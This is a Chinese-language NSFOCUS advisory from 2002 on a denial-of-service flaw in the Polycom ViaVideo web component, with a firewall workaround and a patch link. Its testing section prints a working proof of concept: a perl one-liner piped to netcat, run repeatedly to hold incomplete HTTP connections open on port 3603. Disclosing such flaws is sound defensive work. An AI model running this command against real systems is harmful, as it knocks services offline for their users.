首页 -> 安全研究

安全研究

安全漏洞
Polycom ViaVideo Web组件多个不完整HTTP连接远程拒绝服务攻击漏洞

发布日期:2002-10-13
更新日期:2002-10-17

受影响系统:
Polycom ViaVideo 3.0
Polycom ViaVideo 2.2
描述:
ViaVideo是一款由Polycom开发和维护的个人视频通信产品,使用ViaVideo,可以使用户面对面进行交流。ViaVideo包含WEB服务组件。

ViaVideo的WEB服务组件对不完整HTTP请求处理不正确,远程攻击者可以利用这个漏洞进行拒绝服务攻击。

攻击者可以发起多个(4个以上)连接到ViaVideo的WEB服务监听的TCP/3603端口,发送任意不完整HTTP请求,并保持这些连接不断开,就可以导致WEB服务程序不对新的连接进行响应,CPU利用率会达到99%。

<*来源:advisory@prophecy.net.nzadvisory@prophecy.net.nz
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=103463308030702&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

advisory@prophecy.net.nz 提供了如下测试方法:

[jonny@loki 15:21:57 ~]$ perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' | netcat \
10.1.3.54 3603 & [5] 2140
[jonny@loki 15:22:14 ~]$
[jonny@loki 15:22:14 ~]$ jobs
[1]   Running                 perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' | netcat \
10.1.3.54 3603 & [2]   Running                 perl -e 'print "GET " . "/" . " \
HTTP/1.1\r\n"' | netcat 10.1.3.54 3603 & [3]   Running                 perl -e 'print \
"GET " . "/" . " HTTP/1.1\r\n"' | netcat 10.1.3.54 3603 & [4]-  Running               \
perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' | netcat 10.1.3.54 3603 & [5]+  \
Running                 perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' | netcat \
10.1.3.54 3603 & [jonny@loki 15:22:39 ~]$

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 使用防火墙对WEB接口进行正确的配置,限制非法用户访问。

厂商补丁:

Polycom
-------
Polycom提供了一个补丁,从如下地址下载:

http://www.polycom.com/securitycenter

浏览次数:2929
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障